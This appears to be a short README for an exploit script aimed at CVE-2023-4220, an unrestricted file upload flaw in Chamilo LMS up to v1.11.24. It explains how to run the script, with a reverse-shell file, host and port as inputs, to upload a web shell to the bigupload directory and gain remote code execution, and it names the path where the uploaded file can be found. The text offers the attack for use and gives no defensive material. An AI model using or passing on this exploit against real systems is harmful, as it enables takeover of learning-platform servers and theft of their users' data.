This is an Exploit for Unrestricted file upload in big file upload functionality in Chamilo-LMS for this location /main/inc/lib/javascript/bigupload/inc/bigUpload.php in Chamilo LMS <= v1.11.24, and Attackers can obtain remote code execution via uploading of web shell. Then it will allows arbitrary files to be uploaded to /main/inc/lib/javascript/bigupload/files directory.
-You Can at first run the exploit to know how to use it like that:
chmod +x CVE-2023-4220.sh
./CVE-2023-4220.sh
-Then you need to enter the requeierd inputs like that:
~$ ./CVE-2023-4220.sh -f reverse_file -h host_link -p port_in_the_reverse_file
-Here we can found the uploaded file in the server
http://target.test/main/inc/lib/javascript/bigupload/files/